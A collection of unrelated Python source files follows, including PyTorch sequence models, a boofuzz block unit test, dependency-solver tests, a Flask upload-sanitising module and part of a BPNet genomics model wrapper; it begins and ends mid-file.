self.Norm3d_5 = nn.BatchNorm3d(120)
self.conv3d6 = nn.Conv3d(120, 240, kernel_size=(3,3,3), stride = (1,1,1), padding=(1,1,1) )
self.Norm3d_6 = nn.BatchNorm3d(240)
self.Pool3d_2 = torch.nn.AvgPool3d(3, stride=(1,1,1), padding=(1,0,0))
self.projection_encoder = torch.nn.Sequential(*[
self.conv3d1,
self.Norm3d_1,
self.conv3d2,
self.Norm3d_2,
self.relu,
self.conv3d3,
self.Norm3d_3,
self.relu,
self.Pool3d_1,
self.conv3d4,
self.Norm3d_4,
self.tanh,
self.conv3d5,
self.Norm3d_5,
self.tanh,
self.conv3d6,
self.Norm3d_6,
self.tanh,
self.Pool3d_2,
])
self.projection_layer = nn.Linear(self.intermediate_projection_size, self.img_features)
else:
self.projection_features = torch.nn.Parameter(torch.normal(0, 0.01, size=(self.additional_rnn_calls, self.img_features), requires_grad=True))
#recurrent layers
self.hidden_dim = hidden_dim
self.linear_rnn = nn.LSTM(self.img_features, self.hidden_dim, batch_first = True, num_layers = num_recurrent_layers, bidirectional=rnn_bidirectional)
self.linear_rnn_init_hidden = torch.nn.Parameter(torch.normal(0, 0.01, size=(self.linear_rnn.num_layers*(int(self.linear_rnn.bidirectional)+1),self.hidden_dim)), requires_grad=True)
self.linear_rnn_init_cell = torch.nn.Parameter(torch.normal(0, 0.01, size=(self.linear_rnn.num_layers*(int(self.linear_rnn.bidirectional)+1),self.hidden_dim)), requires_grad=True)
# Sub-convolutional layers.
self.subConv1 = nn.Conv2d(1, 16, kernel_size=5, stride=(2,2), padding=(2,2))
self.subConvNorm_1 = nn.BatchNorm2d(self.subConv1.out_channels)
self.subConv2 = nn.Conv2d(16, 32, kernel_size=5, stride=(1,2), padding=(2,2))
self.subConvNorm_2 = nn.BatchNorm2d(self.subConv2.out_channels)
self.subConv3 = nn.Conv2d(32, 64, kernel_size=5, stride=1)
self.subConvNorm_3 = nn.BatchNorm2d(self.subConv3.out_channels)
self.subConvPool_1 = torch.nn.MaxPool2d(3, stride=(1,1))
self.subConv4 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.subConvNorm_4 = nn.BatchNorm2d(self.subConv4.out_channels)
self.subConv5= nn.Conv2d(64, 128, kernel_size=3, stride=1)
self.subConvNorm_5 = nn.BatchNorm2d(self.subConv5.out_channels)
self.subConvPool_2 = torch.nn.MaxPool2d(3, stride=(1,1))
self.hidden_decoder = torch.nn.Sequential(*[
self.subConv1,
self.subConvNorm_1,
self.relu,
self.subConv2,
self.subConvNorm_2,
self.subConv3,
self.relu,
self.subConvNorm_3,
self.relu,
self.subConvPool_1,
self.subConv4,
self.subConvNorm_4,
self.relu,
self.subConv5,
self.subConvNorm_5,
self.relu,
self.subConvPool_2,
])
self.hidden_decoder_features = 2432
self.numvars = self.output_dimension*self.params_per_dimension
self.covarsperdim = int((self.output_dimension-1)*self.output_dimension/2)
self.numcovars = self.covarsperdim*self.params_per_dimension
self.classifier = nn.Sequential(*[
nn.Linear(self.hidden_decoder_features, 1200),
self.relu,
nn.Linear(1200, 500),
self.tanh,
nn.Linear(500, self.params_per_dimension)
#nn.Linear(2432, self.params_per_dimension)
]
)
self.var_linear = nn.Linear(250, self.params_per_dimension)
self.var_linear.weight=torch.nn.Parameter(0.0001*torch.randn(self.params_per_dimension, 250), requires_grad=True)
self.var_linear.bias=torch.nn.Parameter(1.0*torch.ones(self.params_per_dimension), requires_grad=True)
self.var_classifier = nn.Sequential(*[
nn.Linear(self.hidden_decoder_features, 1200),
self.relu,
nn.Linear(1200, 250),
self.activations["sigmoid"],
self.var_linear,
self.relu
]
)
self.covar_linear = nn.Linear(self.output_dimension*250, self.numcovars)
self.covar_linear.weight=torch.nn.Parameter(0.0001*torch.randn(self.numcovars, self.output_dimension*250), requires_grad=True)
self.covar_linear.bias=torch.nn.Parameter(0.001*torch.ones(self.numcovars), requires_grad=True)
self.covar_classifier = nn.Sequential(*[
nn.Linear(self.hidden_decoder_features, 1200),
self.relu,
nn.Linear(1200, 250),
self.activations["tanh"],
nn.Flatten(),
self.covar_linear
]
)
def forward(self, x):
#resize for convolutional layers
batch_size = x.shape[0]
#print(y.shape)
convin = x.view(-1, self.input_channels, self.imsize[0], self.imsize[1])
convout = self.state_encoder(convin)
context_in = convout.view(batch_size , self.context_length , self.img_features)
linear_rnn_init_hidden = self.linear_rnn_init_hidden.unsqueeze(1).repeat(1,batch_size,1)
linear_rnn_init_cell = self.linear_rnn_init_cell.unsqueeze(1).repeat(1,batch_size,1)
# linear_rnn_init_hidden = self.linear_rnn_init_hidden.expand(self.linear_rnn_init_hidden.shape[0],batch_size,self.linear_rnn_init_hidden.shape[1])
# linear_rnn_init_cell = self.linear_rnn_init_cell.expand(self.linear_rnn_init_cell.shape[0],batch_size,self.linear_rnn_init_cell.shape[1])
#print(context_in.shape)
# = RNNUtils.pack_padded_sequence(context_in, (context_in.shape[1]*np.ones(context_in.shape[0])).tolist() , batch_first=True, enforce_sorted=False)
_, (linear_new_hidden, linear_new_cell) = self.linear_rnn(context_in, (linear_rnn_init_hidden, linear_rnn_init_cell) )
#print(conv3d_out.shape)
if self.use_3dconv:
conv3d_out = self.projection_encoder( x.view(batch_size, self.input_channels, self.context_length, self.imsize[0], self.imsize[1]) )
projection_in = conv3d_out.view(batch_size, self.additional_rnn_calls, self.intermediate_projection_size)
projection_features = self.projection_layer(projection_in)
else:
projection_features = self.projection_features.expand(batch_size,self.projection_features.shape[0],self.projection_features.shape[1])
x_linear, (final_hidden_position, final_cell_position) = self.linear_rnn( projection_features , (linear_new_hidden, linear_new_cell) )
x_linear_unsqueeze = x_linear.unsqueeze(1)
hidden_convout = self.hidden_decoder(x_linear_unsqueeze)
x_features = hidden_convout.view(batch_size,self.output_dimension,self.hidden_decoder_features)
means_ = self.classifier(x_features).transpose(1,2)
varfactors_ = (self.var_classifier(x_features) + 1E-5).transpose(1,2)
covarfactors_ = self.covar_classifier(x_features).view(batch_size, self.params_per_dimension, self.covarsperdim)
if self.fix_first_point:
means = torch.cat([torch.zeros(batch_size, 1, self.output_dimension, dtype=means_.dtype, device=means_.device), means_], dim=1)
varfactors = torch.cat([1E-4*torch.ones(batch_size, 1, self.output_dimension, dtype=varfactors_.dtype, device=varfactors_.device), varfactors_], dim=1)
covarfactors = torch.cat([torch.zeros(batch_size, 1, self.covarsperdim, dtype=covarfactors_.dtype, device=covarfactors_.device), covarfactors_], dim=1)
else:
means = means_
varfactors = varfactors_
covarfactors = covarfactors_
return means, varfactors, covarfactors
class ConvolutionalAutoencoder(nn.Module):
def __init__(self, manifold_channels, in_channels):
super(ConvolutionalAutoencoder, self).__init__()
self.manifold_channels = manifold_channels
self.elu = torch.nn.ELU()
self.sigmoid = torch.nn.Sigmoid()
self.conv_layers = nn.Sequential(*[
nn.Conv2d(in_channels, 32, kernel_size = 5, stride=1, bias = False),
nn.BatchNorm2d(32),
self.elu,
nn.Conv2d(32, 64, kernel_size = 5, stride=1, bias = False),
nn.BatchNorm2d(64),
self.elu,
nn.Conv2d(64, 64, kernel_size = 5, bias = False),
nn.BatchNorm2d(64),
self.elu,
nn.Conv2d(64, 64, kernel_size = 5, bias = False),
nn.BatchNorm2d(64),
nn.Conv2d(64, manifold_channels, kernel_size = 12, bias = True),
self.elu,
])
self.deconv_layers = nn.Sequential(*[
nn.ConvTranspose2d(manifold_channels, 64, kernel_size = 12, bias = True),
nn.BatchNorm2d(64),
self.elu,
nn.ConvTranspose2d(64, 32, kernel_size = 5, bias = False),
nn.BatchNorm2d(32),
self.elu,
nn.ConvTranspose2d(32, 16, kernel_size = 5, stride=1, bias = False),
nn.BatchNorm2d(16),
self.elu,
nn.ConvTranspose2d(16, 16, kernel_size = 5, bias = False),
nn.BatchNorm2d(16),
self.elu,
nn.ConvTranspose2d(16, in_channels, kernel_size = 5, stride=1, bias = False),
self.sigmoid,
])
def encoder(self, x):
return self.conv_layers(x)
def decoder(self, z):
return self.deconv_layers(z)
def forward(self, x):
z = self.encoder(x)
# print(z.shape)
y = self.decoder(z)
return z, y
class VariationalImageCurveDecoder(nn.Module):
def __init__(self, manifold_dimension, reconstruct_dimension, hidden_dim=350):
super(VariationalImageCurveDecoder, self).__init__()
self.reconstruct_dimension = reconstruct_dimension
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
# self.rnn = nn.LSTM(manifold_dimension, hidden_dim, batch_first=True)
# self.init_hidden = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
# self.init_cell = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
# self.linear = nn.Linear(hidden_dim, reconstruct_dimension)
# self.linear1 = nn.Linear(manifold_dimension, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, reconstruct_dimension)
self.linear_layers = torch.nn.Sequential(*[
nn.Linear(manifold_dimension, hidden_dim, bias = True ),
self.sigmoid,
nn.Linear(hidden_dim, reconstruct_dimension, bias = False ),
])
def forward(self, sample_curve_points):
# batch_size = sample_curve_points.shape[0]
# h_0 = self.init_hidden.repeat(1,batch_size,1)
# c_0 = self.init_cell.repeat(1,batch_size,1)
# rnn_out, (h_n, c_n) = self.rnn(sample_curve_points, (h_0, c_0) )
return torch.clamp(self.linear_layers(sample_curve_points), 0.0, 1.0)
class VariationalImageCurveEncoder(nn.Module):
def __init__(self, output_dim = 250, bezier_order=3, sequence_length=5, input_channels=3, hidden_dim=500):
super(VariationalImageCurveEncoder, self).__init__()
self.output_dim = output_dim
self.bezier_order = bezier_order
self.sequence_length = sequence_length
self.num_latent_vars = (bezier_order+1)*output_dim
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
self.conv2dlayers = torch.nn.Sequential(*[
# nn.BatchNorm2d(input_channels),
nn.Conv2d(input_channels, 24, kernel_size=5, stride=2, bias=False),
nn.BatchNorm2d(24),
#self.relu,
nn.Conv2d(24, 36, kernel_size=5, stride=2, bias=False),
nn.BatchNorm2d(36),
#self.relu,
nn.Conv2d(36, 48, kernel_size=5, stride=2, bias=False),
nn.BatchNorm2d(48),
# self.relu,
nn.Conv2d(48, 64, kernel_size=3, bias=False),
nn.BatchNorm2d(64),
#self.relu,
nn.Conv2d(64, 96, kernel_size=3),
# self.tanh,
nn.BatchNorm2d(96)
])
self.rnn = nn.LSTM(1728, hidden_dim, batch_first=True)
self.init_hidden = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
self.init_cell = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
self.down_to_bezier_mu = nn.Linear(hidden_dim, self.num_latent_vars)
self.down_to_bezier_logvar = nn.Linear(hidden_dim, self.num_latent_vars)
def forward(self, images):
batch_size = images.shape[0]
assert(images.shape[1]==self.sequence_length)
channels, rows, columns = images.shape[2:]
packed_for_2dconv = images.view(-1,channels,rows,columns)
conv2dout = self.conv2dlayers(packed_for_2dconv)
# print(conv2dout.shape)
conv2doutflatten = conv2dout.view(batch_size, self.sequence_length, -1, )
# print(conv2doutflatten.shape)
h_0 = self.init_hidden.unsqueeze(1).repeat(1,batch_size,1)
c_0 = self.init_cell.unsqueeze(1).repeat(1,batch_size,1)
rnnout, (h_n, c_n) = self.rnn(conv2doutflatten, (h_0, c_0))
# print(rnnout.shape)
#encoderout = self.encoder(images)
bezier_mu_flat = self.down_to_bezier_mu(rnnout[:,-1])
bezier_logstdev_flat = self.down_to_bezier_mu(rnnout[:,-1])
bezier_stdev_flat = torch.exp(0.5*bezier_logstdev_flat)
bezier_mu = bezier_mu_flat.view(batch_size, self.bezier_order+1, self.output_dim)
bezier_stdev = bezier_stdev_flat.view(batch_size, self.bezier_order+1, self.output_dim)
scale_tril = torch.diag_embed(bezier_stdev_flat)
# distribution = torch.distributions.MultivariateNormal(, scale_tril=scale_tril, validate_args=True)
# # curvesample = distribution.sample((1,))[0].view(batch_size, self.bezier_order+1, self.output_dim)
return bezier_mu, bezier_stdev
|
469718
|
from pytest_bdd import given, when, then, scenarios
from boofuzz import Request, Block, Byte
scenarios('block_original_value.feature')
@given('A Block with contents')
def request_one_block(context):
request = Request(name="unit-test-request")
block = Block(name="unit-test-block", request=request)
request.push(block)
byte1 = Byte(0x01, name="Byte block 1")
request.push(byte1)
request.pop()
context.uut = block
@given('Mutated once')
def mutate_once(context):
context.uut.mutate()
@given('Mutated twice')
def mutate_twice(context):
context.uut.mutate()
context.uut.mutate()
@given('Mutated thrice')
def mutate_thrice(context):
context.uut.mutate()
context.uut.mutate()
context.uut.mutate()
@when('Calling original_value')
def call_original_value(context):
context.uut.render() # Ensure UUT object state is updated
context.result = context.uut.original_value
@then('Result equals .render()')
def result_equals_render(context):
assert context.result == context.uut.render()
@then('Result equals .render() after .reset()')
def result_equals_render_after_reset(context):
context.uut.reset()
assert context.result == context.uut.render()
|
469731
|
import datetime
import pandas as pd
from ast import literal_eval
def invert_oracle_sense(oracle):
def inverted_oracle(lambda_k):
x_k, d_k, diff_d_k = oracle(lambda_k)
return x_k, -d_k, -diff_d_k
return inverted_oracle
def record_logger(logger, filename=r'logger_record.csv'):
""" Records the information contained in a method logger into a csv. """
inner_problem = logger.method.oracle.__self__
instance_name = inner_problem.instance_name
instance_subtype = inner_problem.instance_subtype
instance_type = inner_problem.instance_type
method_desc = logger.method.desc
method_name = logger.method.method_name
method_parameter = logger.method.parameter
d_k = logger.d_k_iterates
d_k = ['%.2f' % elem for elem in d_k] # format it
oracle_calls = logger.oracle_calls
computation_times = logger.iteration_time
computation_times = ['%.2f' % elem for elem in computation_times] # format it
date = datetime.datetime.now()
try:
df = pd.read_csv(filename)
except IOError as e:
# TODO there is something buggy about this when I run it in the ipython notebook; it thinks the file int created
print(e)
print('Record file does not exist. Creating {} ...'.format(filename))
columns = ('date', 'instance_name', 'instance_subtype', 'instance_type',
'method_desc', 'method_name', 'method_parameter', 'd_k', 'oracle_calls',
'computation_times')
df = pd.DataFrame(columns=columns)
# Append data to dataframe
df.loc[len(df)] = [
date, instance_name, instance_subtype, instance_type,
method_desc, method_name, method_parameter,
d_k, oracle_calls, computation_times
]
df.to_csv(filename, index=False)
def flatten_record_dataframe(df):
""" The above function stores
- d_k
- oracle_calls
- computation_times
as strings. We flatten these back to lists (of floats) """
for index, row in df.iterrows():
d_k = literal_eval(row.d_k) # list results were saved as strings...
d_k = [float(i) for i in d_k] # so we have to convert them back to floats manually
df.set_value(index, 'd_k', d_k)
# same for oracle_calls
oracle_calls = literal_eval(row.oracle_calls)
oracle_calls = [float(i) for i in oracle_calls]
df.set_value(index, 'oracle_calls', oracle_calls)
# and computation_times
computation_times = literal_eval(row.computation_times) # list results were saved as strings...
computation_times = [float(i) for i in computation_times] # so we have to convert them back to floats manually
df.set_value(index, 'computation_times', computation_times)
return df
|
469744
|
import six
if six.PY3:
import unittest
else:
import unittest2 as unittest
from depsolver.package \
import \
PackageInfo
from depsolver.pool \
import \
Pool
from depsolver.repository \
import \
Repository
from depsolver.requirement \
import \
Requirement
from depsolver.solver.core \
import \
Install, Solver, Update
from depsolver.solver.policy \
import \
DefaultPolicy
R = Requirement.from_string
mkl_10_1_0 = PackageInfo.from_string("mkl-10.1.0")
mkl_10_2_0 = PackageInfo.from_string("mkl-10.2.0")
mkl_10_3_0 = PackageInfo.from_string("mkl-10.3.0")
mkl_11_0_0 = PackageInfo.from_string("mkl-11.0.0")
numpy_1_6_0 = PackageInfo.from_string("numpy-1.6.0; depends (mkl)")
numpy_1_6_1 = PackageInfo.from_string("numpy-1.6.1; depends (mkl)")
numpy_1_7_0 = PackageInfo.from_string("numpy-1.7.0; depends (mkl)")
nomkl_numpy_1_7_0 = PackageInfo.from_string("nomkl_numpy-1.7.0; depends (numpy == 1.7.0)")
scipy_0_10_1 = PackageInfo.from_string("scipy-0.10.1; depends (numpy >= 1.6.0)")
scipy_0_11_0 = PackageInfo.from_string("scipy-0.11.0; depends (numpy >= 1.6.0)")
scipy_0_12_0 = PackageInfo.from_string("scipy-0.12.0; depends (numpy >= 1.7.0)")
policy = DefaultPolicy()
def solve(pool, requirement, installed_repository, policy):
solver = Solver(pool, installed_repository, policy)
return solver.solve(requirement)
class TestSimpleScenario(unittest.TestCase):
"""Scenario with no dependencies."""
@unittest.expectedFailure
def test_no_install(self):
"""Ensure the most up-to-date version is installed when directly installed."""
repo = Repository([mkl_10_1_0, mkl_10_2_0, mkl_10_3_0, mkl_11_0_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("mkl"), installed_repo, policy)
self.assertEqual(operations, [Install(mkl_11_0_0)])
@unittest.expectedFailure
def test_already_satisfied(self):
"""Ensure we don't install a more recent version when the requirement
is already satisfied."""
repo = Repository([mkl_10_1_0, mkl_10_2_0, mkl_10_3_0, mkl_11_0_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
installed_repo.add_package(mkl_10_2_0)
operations = solve(pool, R("mkl"), installed_repo, policy)
self.assertEqual(operations, [])
@unittest.expectedFailure
def test_already_installed_but_not_satisfied(self):
"""Ensure we update to the most recent version when the requirement
is not already satisfied."""
repo = Repository([mkl_10_1_0, mkl_10_2_0, mkl_10_3_0, mkl_11_0_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
installed_repo.add_package(mkl_10_2_0)
operations = solve(pool, R("mkl >= 10.3.0"), installed_repo, policy)
self.assertEqual(operations, [Update(mkl_10_2_0, mkl_11_0_0)])
class TestOneLevel(unittest.TestCase):
"""Scenario with one level of dependencies."""
@unittest.expectedFailure
def test_simple(self):
"""Numpy depends on MKL, one version of NumPy only."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(mkl_11_0_0), Install(numpy_1_6_0)])
@unittest.expectedFailure
def test_simple2(self):
"""Numpy depends on MKL, ensure we install the most up-to-date version."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(mkl_11_0_0), Install(numpy_1_7_0)])
@unittest.expectedFailure
def test_dependency_already_provided(self):
"""Numpy depends on MKL, MKL already installed."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository([mkl_11_0_0])
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(numpy_1_7_0)])
@unittest.expectedFailure
def test_dependency_already_provided_but_older(self):
"""Numpy depends on MKL, older MKL already installed."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository([mkl_10_3_0])
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(numpy_1_7_0)])
class TestTwoLevels(unittest.TestCase):
"""Scenario with one level of dependencies."""
@unittest.expectedFailure
def test_simple(self):
r_operations = [Install(mkl_11_0_0), Install(numpy_1_7_0),
Install(scipy_0_12_0)]
repo = Repository([mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_6_1,
numpy_1_7_0, scipy_0_12_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
req = R("scipy")
operations = solve(pool, req, installed_repo, policy)
self.assertEqual(operations, r_operations)
@unittest.expectedFailure
def test_simple_provided(self):
r_operations = [Install(nomkl_numpy_1_7_0), Install(scipy_0_11_0)]
repo = Repository([mkl_11_0_0, scipy_0_11_0, nomkl_numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("scipy"), installed_repo, policy)
self.assertEqual(operations, r_operations)
|
469750
|
import re
import time
import mimetypes
from werkzeug.exceptions import BadRequest, RequestEntityTooLarge
from flask import current_app
try:
import magic as magic_module
magic = magic_module.Magic(mime=True)
magic_bufsz = magic.getparam(magic_module.MAGIC_PARAM_BYTES_MAX)
except ImportError:
magic = None
magic_bufsz = None
from ..constants import (
COMPLETE,
FILENAME,
FOREVER,
HASH,
LOCKED,
SIZE,
TIMESTAMP_DOWNLOAD,
TIMESTAMP_MAX_LIFE,
TIMESTAMP_UPLOAD,
TYPE,
TYPE_HINT,
internal_meta,
)
from .name import ItemName
from .decorators import threaded
from .hashing import compute_hash, hash_new
# we limit to 250 characters as we do not want to accept arbitrarily long
# filenames. other than that, there is no specific reason we could not
# also take more (or less).
MAX_FILENAME_LENGTH = 250
class Upload:
_filename_re = re.compile(r'[^a-zA-Z0-9 *+:;.,_-]+')
_type_re = re.compile(r'[^a-zA-Z0-9/+.-]+')
@classmethod
def filter_size(cls, i):
"""
Filter size.
Check for advertised size.
"""
try:
i = int(i)
except (ValueError, TypeError):
raise BadRequest(description='Size is invalid')
if i > current_app.config['MAX_ALLOWED_FILE_SIZE']:
raise RequestEntityTooLarge()
return i
@classmethod
def filter_filename(cls, filename, storage_name, content_type, content_type_hint):
"""
Filter filename.
Only allow some basic characters and shorten to 50 characters.
"""
# Make up filename if we don't have one
if not filename:
if not content_type:
content_type = content_type_hint
# note: stdlib mimetypes.guess_extension is total crap
if content_type.startswith("text/"):
ext = ".txt"
else:
ext = ".bin"
filename = storage_name + ext
return cls._filename_re.sub('', filename)[:MAX_FILENAME_LENGTH]
@classmethod
def filter_type(cls, ct, ct_hint, filename=None):
"""
Filter Content-Type
Only allow some basic characters and shorten to 50 characters.
Return value:
tuple[0] - content-type string
tuple[1] - whether tuple[0] is hint or not
True: content-type is just a hint
False: content-type is not a hint, was specified by user
"""
if not ct and filename:
ct, encoding = mimetypes.guess_type(filename)
if not ct:
return ct_hint, True
return cls._type_re.sub('', ct)[:50], False
@classmethod
def meta_new(cls, item, input_size, input_filename, input_type,
input_type_hint, storage_name, maxlife_stamp=FOREVER):
item.meta[FILENAME] = cls.filter_filename(
input_filename, storage_name, input_type, input_type_hint
)
item.meta[SIZE] = cls.filter_size(input_size)
ct, hint = cls.filter_type(input_type, input_type_hint, input_filename)
item.meta[TYPE] = ct
item.meta[TYPE_HINT] = hint
item.meta[TIMESTAMP_UPLOAD] = int(time.time())
item.meta[TIMESTAMP_DOWNLOAD] = 0
item.meta[LOCKED] = current_app.config['UPLOAD_LOCKED']
item.meta[COMPLETE] = False
item.meta[HASH] = ''
item.meta[TIMESTAMP_MAX_LIFE] = maxlife_stamp
@classmethod
def meta_complete(cls, item, file_hash):
# update TYPE by python-magic if not decided yet
if item.meta.pop(TYPE_HINT, False):
if magic and current_app.config.get('USE_PYTHON_MAGIC', False):
if item.meta[TYPE] == 'application/octet-stream':
item.meta[TYPE] = magic.from_buffer(item.data.read(magic_bufsz, 0))
item.meta[COMPLETE] = True
item.meta[HASH] = file_hash
@staticmethod
def data(item, f, size_input, offset=0):
"""
Copy data from temp file into storage.
"""
read_length = 16 * 1024
size_written = 0
hasher = hash_new()
while True:
read_length = min(read_length, size_input)
if size_input == 0:
break
buf = f.read(read_length)
if not buf:
# Should not happen, we already checked the size
raise RuntimeError
item.data.write(buf, offset + size_written)
hasher.update(buf)
len_buf = len(buf)
size_written += len_buf
size_input -= len_buf
return size_written, hasher.hexdigest()
def create_item(f, filename, size, content_type, content_type_hint,
maxlife_stamp=FOREVER):
"""
create an item from open file <f> with the given metadata, return the item name.
"""
name = ItemName.create(current_app.storage)
with current_app.storage.create(name, size) as item:
size_written, file_hash = Upload.data(item, f, size)
Upload.meta_new(item, size, filename, content_type, content_type_hint,
name, maxlife_stamp=maxlife_stamp)
Upload.meta_complete(item, file_hash)
return name
def filter_internal(meta):
"""
filter internal meta data out.
"""
return {k: v for k, v in meta.items() if k not in internal_meta}
@threaded
def background_compute_hash(storage, name):
with storage.openwrite(name) as item:
size = item.meta[SIZE]
file_hash = compute_hash(item.data, size)
item.meta[HASH] = file_hash
|
469780
|
from strictdoc.core.level_counter import LevelCounter
def test_01():
level_counter = LevelCounter()
assert level_counter.get_string() == ""
level_counter.adjust(1)
assert level_counter.get_string() == "1"
level_counter.adjust(1)
assert level_counter.get_string() == "2"
level_counter.adjust(2)
assert level_counter.get_string() == "2.1"
level_counter.adjust(3)
assert level_counter.get_string() == "2.1.1"
level_counter.adjust(2)
assert level_counter.get_string() == "2.2"
level_counter.adjust(1)
assert level_counter.get_string() == "3"
|
469800
|
import os
from kipoi_utils.data_utils import get_dataset_item, numpy_collate_concat
from kipoi_utils.utils import unique_list
import keras.backend as K
import matplotlib.ticker as ticker
from bpnet.functions import softmax
from genomelake.extractors import FastaExtractor
from keras.models import load_model
from collections import OrderedDict
from bpnet.plot.tracks import plot_tracks, filter_tracks
from bpnet.extractors import extract_seq
from bpnet.data import nested_numpy_minibatch
from bpnet.seqmodel import SeqModel
from tqdm import tqdm
from bpnet.utils import flatten_list
from concise.utils.plot import seqlogo
from bpnet.functions import mean
from concise.preprocessing import encodeDNA
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from genomelake.extractors import BigwigExtractor
import pyBigWig
import logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
# TODO - remove the fasta file
# TODO is it possible to get rid of this class entirely?
class BPNetSeqModel:
"""BPNet based on SeqModel
"""
def __init__(self, seqmodel, fasta_file=None):
self.seqmodel = seqmodel
self.tasks = self.seqmodel.tasks
self.fasta_file = fasta_file
assert isinstance(self.seqmodel, SeqModel)
# TODO - add some sanity checks (profile head available etc)
@classmethod
def from_mdir(cls, model_dir):
from bpnet.seqmodel import SeqModel
# figure out also the fasta_file if present (from dataspec)
from bpnet.dataspecs import DataSpec
ds_path = os.path.join(model_dir, "dataspec.yml")
if os.path.exists(ds_path):
ds = DataSpec.load(ds_path)
fasta_file = ds.fasta_file
else:
fasta_file = None
return cls(SeqModel.from_mdir(model_dir), fasta_file=fasta_file)
def input_seqlen(self):
return self.seqmodel.seqlen
def predict(self, seq, batch_size=512):
"""Make model prediction
Args:
seq: numpy array of one-hot-encoded array of sequences
batch_size: batch size
Returns:
dictionary key=task and value=prediction for the task
"""
preds = self.seqmodel.predict(seq, batch_size=batch_size)
return {task: preds[f'{task}/profile'] * np.exp(preds[f'{task}/counts'][:, np.newaxis])
for task in self.seqmodel.tasks}
def contrib_score_all(self, seq, method='deeplift', aggregate_strand=True, batch_size=512,
pred_summaries=['profile/wn', 'counts/pre-act']):
"""Compute all contribution scores
Args:
seq: one-hot encoded DNA sequences
method: 'grad', 'deeplift' or 'ism'
aggregate_strands: if True, the average contribution scores across strands will be returned
batch_size: batch size when computing the contribution scores
Returns:
dictionary with keys: {task}/{pred_summary}/{strand_i} or {task}/{pred_summary}
and values with the same shape as `seq` corresponding to contribution scores
"""
assert aggregate_strand
contrib_scores = self.seqmodel.contrib_score_all(seq, method=method)
return {f"{task}/" + self._get_old_contrib_score_name(pred_summary): contrib_scores[f"{task}/{pred_summary}"]
for task in self.seqmodel.tasks
for pred_summary in pred_summaries}
def _get_old_contrib_score_name(self, s):
# TODO - get rid of the old nomenclature
s2s = {"profile/wn": 'profile', 'counts/pre-act': 'count'}
return s2s[s]
def sim_pred(self, central_motif, side_motif=None, side_distances=[], repeat=128, contribution=[]):
"""Embed two motifs in random sequences and obtain their average predictions.
Args:
contribution: list of contribution scores
"""
from bpnet.simulate import generate_seq, average_profiles, flatten
batch_size = repeat
seqlen = self.seqmodel.seqlen
tasks = self.seqmodel.tasks
# simulate sequence
seqs = encodeDNA([generate_seq(central_motif, side_motif=side_motif,
side_distances=side_distances, seqlen=seqlen)
for i in range(repeat)])
# get predictions
scaled_preds = self.predict(seqs, batch_size=batch_size)
if contribution:
# get the contribution scores (compute only the profile and counts contribution)
contrib_scores_all = self.seqmodel.contrib_score_all(seqs, intp_pattern=['*/profile/wn', '*/counts/pre-act'])
contrib_scores = {t: {self._get_old_contrib_score_name(contrib_score_name): seqs * contrib_scores_all[f'{t}/{contrib_score_name}']
for contrib_score_name in contribution}
for t in tasks}
# merge and aggregate the profiles
out = {"contrib": contrib_scores, "profile": scaled_preds}
else:
out = {"profile": scaled_preds}
return average_profiles(flatten(out, "/"))
def get_seq(self, regions, variants=None, use_strand=False, fasta_file=None):
"""Get the one-hot-encoded sequence used to make model predictions and
optionally augment it with the variants
"""
if fasta_file is None:
fasta_file = self.fasta_file
if variants is not None:
if use_strand:
raise NotImplementedError("use_strand=True not implemented for variants")
# Augment the regions using a variant
if not isinstance(variants, list):
variants = [variants] * len(regions)
else:
assert len(variants) == len(regions)
seq = np.stack([extract_seq(interval, variant, fasta_file, one_hot=True)
for variant, interval in zip(variants, regions)])
else:
variants = [None] * len(regions)
seq = FastaExtractor(fasta_file, use_strand=use_strand)(regions)
return seq
def predict_all(self, seq, contrib_method='grad', batch_size=512, pred_summaries=['profile/wn', 'counts/pre-act']):
"""Make model prediction based
"""
preds = self.predict(seq, batch_size=batch_size)
if contrib_method is not None:
contrib_scores = self.contrib_score_all(seq, method=contrib_method, aggregate_strand=True,
batch_size=batch_size, pred_summaries=pred_summaries)
else:
contrib_scores = dict()
out = [dict(
seq=get_dataset_item(seq, i),
# interval=regions[i],
pred=get_dataset_item(preds, i),
# TODO - shall we call it hyp_contrib score or contrib_score?
contrib_score=get_dataset_item(contrib_scores, i),
) for i in range(len(seq))]
return out
def predict_regions(self, regions,
variants=None,
contrib_method='grad',
pred_summaries=['profile/wn', 'counts/pre-act'],
use_strand=False,
fasta_file=None,
batch_size=512):
